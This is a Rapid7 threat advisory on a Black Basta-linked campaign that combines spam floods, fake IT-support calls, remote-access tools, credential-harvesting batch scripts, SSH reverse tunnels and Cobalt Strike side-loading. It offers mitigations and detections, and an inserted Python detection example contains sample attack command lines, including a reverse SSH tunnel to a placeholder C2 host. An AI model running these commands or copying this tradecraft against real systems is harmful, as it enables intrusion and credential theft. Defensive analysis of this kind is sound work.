Last updated on Tuesday, May 28, 2024, 21:20:45 GMT

Co-authored by Rapid7 analysts Tyler McGraw, Thomas Elkins, and Evan McCann

Executive Summary

Rapid7 has identified an ongoing social engineering campaign that has been targeting multiple managed detection and response (MDR) customers. The incident involves a threat actor overwhelming a user's email with junk and then calling the user, offering assistance. The threat actor prompts impacted users to download remote monitoring and management software like AnyDesk or to utilize Microsoft's built-in Quick Assist feature in order to establish a remote connection. Once a remote connection has been established, the threat actor moves to download payloads from their infrastructure in order to harvest the impacted user's credentials and maintain persistence on the impacted user's asset.

In one incident, Rapid7 observed the threat actor deploying Cobalt Strike beacons to other assets within the compromised network. While ransomware deployment was not observed in any of the cases Rapid7 responded to, the indicators of compromise we observed were previously linked with the Black Basta ransomware operators based on OSINT and other incident response engagements handled by Rapid7.

Overview

Since late April 2024, Rapid7 has identified multiple cases of a novel social engineering campaign. The attacks begin with a group of users in the target environment receiving a large volume of spam emails. In all observed cases, the spam was significant enough to overwhelm the email protection solutions in place and arrived in the user’s inbox. Rapid7 determined many of the emails themselves were not malicious, but rather consisted of newsletter sign-up confirmation emails from numerous legitimate organizations across the world.

Figure 1. Example of spam emails.

While the emails were being sent and the impacted users were struggling to handle the volume of spam, the threat actor began cycling through calls to the impacted users, posing as a member of their organization’s IT team reaching out to offer support for their email issues. For each user, the threat actor attempted to socially engineer the user into providing remote access to their computer through the use of legitimate remote monitoring and management solutions. In all observed cases, Rapid7 determined initial access was facilitated by either the download and execution of the commonly abused RMM solution AnyDesk, or the built-in Windows remote support utility Quick Assist.

In the event the threat actor’s social engineering attempts were unsuccessful in getting a user to provide remote access, Rapid7 observed they immediately moved on to another user who had been targeted with their mass spam emails.

Once the threat actor successfully gains access to a user’s computer, they begin executing a series of batch scripts, presented to the user as an update, likely in an attempt to appear more legitimate and evade suspicion. The first batch script executed by the threat actor typically verifies connectivity to their command and control (C2) server and then downloads a zip archive containing a legitimate copy of OpenSSH for Windows (ultimately renamed to RuntimeBroker.exe), along with its dependencies, several RSA keys, and other SSH configuration files. SSH is a protocol used to securely send commands to remote computers over the internet. While there are hard-coded C2 servers in many of the batch scripts, some are written so that the C2 server and listening port can be specified on the command line as an override.

Figure 2. Snippet of the initial batch script.
Figure 3. Compressed SSH files within s.zip.

The script then establishes persistence via run key entries in the Windows registry. The run keys created by the batch script point to additional batch scripts that are created at run time. Each batch script pointed to by the run keys executes SSH via PowerShell in an infinite loop to attempt to establish a reverse shell connection to the specified C2 server using the downloaded RSA private key. Rapid7 observed several different variations of the batch scripts used by the threat actor, some of which also conditionally establish persistence using other remote monitoring and management solutions, including NetSupport and ScreenConnect.

Figure 4. Batch script creating run keys for persistence.

In all observed cases, Rapid7 has identified the use of a batch script to harvest the victim’s credentials from the command line using PowerShell. The credentials are gathered under the false pretext that the “update” requires the user to log in. In most observed batch script variations, the credentials are immediately exfiltrated to the threat actor’s server via a Secure Copy (SCP) command. In at least one other observed script variant, credentials are saved to an archive and must be manually retrieved.

Figure 5. Stolen credentials are typically exfiltrated immediately.
Figure 6. Script variant without Secure Copy.

In one observed case, once the initial compromise was complete, the threat actor attempted to move laterally throughout the environment via SMB using Impacket, and ultimately failed to deploy Cobalt Strike despite several attempts. While Rapid7 did not observe successful data exfiltration or ransomware deployment in any of our investigations, the indicators of compromise found via forensic analysis conducted by Rapid7 are consistent with the Black Basta ransomware group based on internal and open source intelligence.

Forensic Analysis

In one incident, Rapid7 observed the threat actor attempting to deploy additional remote monitoring and management tools, including ScreenConnect and the NetSupport remote access trojan (RAT). Rapid7 acquired the Client32.ini file, which holds the NetSupport RAT's configuration data, including the domains used for connection. Rapid7 observed the NetSupport RAT attempt communication with the following domains:

  • rewilivak13 [.] com
  • greekpool [.] com
Figure 7 - NetSupport RAT files and Client32.ini contents

After successfully gaining access to a compromised asset, Rapid7 observed the threat actor attempting to deploy Cobalt Strike beacons, disguised as the legitimate dynamic link library (DLL) 7z.DLL, to other assets within the same network as the compromised asset using the Impacket toolset.

In our analysis of 7z.DLL, Rapid7 observed that the DLL had been altered to include a function whose purpose was to XOR-decrypt the Cobalt Strike beacon using a hard-coded key and then execute the beacon.

The threat actor would attempt to deploy the Cobalt Strike beacon by executing the legitimate binary 7zG.exe and passing the command line argument ‘b’, i.e. “C:\Users\Public\7zG.exe b”. By doing so, the legitimate binary 7zG.exe side-loads 7z.DLL, which in turn executes the embedded Cobalt Strike beacon. This technique is known as DLL side-loading, a method Rapid7 discussed in a previous blog post on the IDAT Loader.

Upon successful execution, Rapid7 observed the beacon inject into a newly created process, choice.exe.

Figure 8 - Cobalt Strike configuration example
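The run key persistence, the renamed OpenSSH binary and the 7zG.exe side-loading described above all surface in process-creation telemetry. The Python below is an added example, not Rapid7's detection logic or any code from the campaign: it evaluates constructed Sysmon-style events against three simplified rules named after the detections listed later in this post; the field names, sample command lines and the c2.invalid host are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events (sample data, not real telemetry).
# Field names mirror Sysmon Event ID 1: Image, CommandLine, OriginalFileName.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /d "C:\Users\Public\update.bat"',
     "OriginalFileName": "reg.exe"},
    {"Image": r"C:\Users\Public\RuntimeBroker.exe",  # renamed OpenSSH client
     "CommandLine": r"RuntimeBroker.exe -i C:\Users\Public\id_rsa -N -R 2222:localhost:22 user@c2.invalid",
     "OriginalFileName": "ssh.exe"},
    {"Image": r"C:\Users\Public\7zG.exe", "CommandLine": r"C:\Users\Public\7zG.exe b",
     "OriginalFileName": "7zG.exe"},
    # Benign control: 7-Zip launched from its install directory must not fire.
    {"Image": r"C:\Program Files\7-Zip\7zG.exe",
     "CommandLine": r'"C:\Program Files\7-Zip\7zG.exe" a out.7z', "OriginalFileName": "7zG.exe"},
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)

def _under_users(path: str) -> bool:
    r"""True when the image sits under <drive>\Users\..., e.g. C:\Users\Public."""
    parts = [p.lower() for p in PureWindowsPath(path).parts]
    return len(parts) > 1 and parts[1] == "users"

def evaluate(event: dict) -> list[str]:
    """Return the names of the detections that match one process-creation event."""
    image, cmd = event.get("Image", ""), event.get("CommandLine", "")
    name = PureWindowsPath(image).name.lower()
    original = event.get("OriginalFileName", "").lower()
    hits = []
    # PE version info says ssh.exe but the file on disk carries another name.
    if original == "ssh.exe" and name != "ssh.exe":
        hits.append("Attacker Technique - Renamed SSH For Windows")
    # Run key persistence written with reg.exe.
    if name == "reg.exe" and re.search(r"\badd\b", cmd, re.IGNORECASE) and RUN_KEY_RE.search(cmd):
        hits.append("Persistence - Run Key Added By Reg.exe")
    # 7-Zip binaries executed from a user profile directory (the side-loading staging location seen here).
    if name in {"7z.exe", "7zg.exe"} and _under_users(image):
        hits.append("Suspicious Process - 7zip Executed From Users Directory")
    return hits

def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Return (event index, detections) for every event that triggered at least one rule."""
    return [(i, h) for i, e in enumerate(events) if (h := evaluate(e))]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS):
        print(idx, names)
```

The renamed-SSH rule depends on the OriginalFileName field that Sysmon reads from the PE version resource, so it catches the RuntimeBroker.exe copy regardless of what the file is called on disk.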

Mitigations

Rapid7 recommends baselining your environment for all installed remote monitoring and management solutions and utilizing application allowlisting solutions, such as AppLocker or Microsoft Defender Application Control, to block all unapproved RMM solutions from executing within the environment. For example, the Quick Assist tool, quickassist.exe, can be blocked from executing via AppLocker. As an additional precaution, Rapid7 recommends blocking domains associated with all unapproved RMM solutions. A public GitHub repository containing a catalog of RMM solutions, their binary names, and associated domains can be found here.

Rapid7 recommends ensuring users are aware of established IT channels and communication methods to identify and prevent common social engineering attacks. We also recommend ensuring users are empowered to report suspicious phone calls and texts purporting to be from internal IT staff.

MITRE ATT&CK Techniques

| Tactic | Technique | Procedure |
|---|---|---|
| Denial of Service | T1498: Network Denial of Service | The threat actor overwhelms email protection solutions with spam. |
| Initial Access | T1566.004: Phishing: Spearphishing Voice | The threat actor calls impacted users and pretends to be a member of their organization’s IT team to gain remote access. |
| Execution | T1059.003: Command and Scripting Interpreter: Windows Command Shell | The threat actor executes batch scripts after establishing remote access to a user’s asset. |
| Execution | T1059.001: Command and Scripting Interpreter: PowerShell | Batch scripts used by the threat actor execute certain commands via PowerShell. |
| Persistence | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | The threat actor creates a run key to execute a batch script via PowerShell, which then attempts to establish a reverse tunnel via SSH. |
| Defense Evasion | T1222.001: File and Directory Permissions Modification: Windows File and Directory Permissions Modification | The threat actor modifies file permissions via batch scripts. |
| Defense Evasion | T1140: Deobfuscate/Decode Files or Information | The threat actor encrypted several zip archive payloads with the password “qaz123”. |
| Credential Access | T1056.001: Input Capture: Keylogging | The threat actor runs a batch script that records the user’s password via command line input. |
| Discovery | T1033: System Owner/User Discovery | The threat actor uses whoami.exe to evaluate whether the impacted user is an administrator. |
| Lateral Movement | T1570: Lateral Tool Transfer | Impacket was used to move payloads between compromised systems. |
| Command and Control | T1572: Protocol Tunneling | An SSH reverse tunnel is used to provide the threat actor with persistent remote access. |

Rapid7 Customers

InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to this malware campaign:

  • Attacker Technique - Renamed SSH For Windows
  • Persistence - Run Key Added By Reg.exe
  • Suspicious Process - Unapproved Application
  • Suspicious Process - 7zip Executed From Users Directory (*InsightIDR product-only customers should evaluate and determine whether they would like to activate this detection within the InsightIDR detection library; this detection is currently active for MDR/MTC customers)
  • Attacker Technique - Enumerating Domain Or Enterprise Admins With Net Command
  • Network Discovery - Domain Controllers Via Net.exe

Indicators of Compromise

Network-based indicators


Host-based indicators (HBIs)

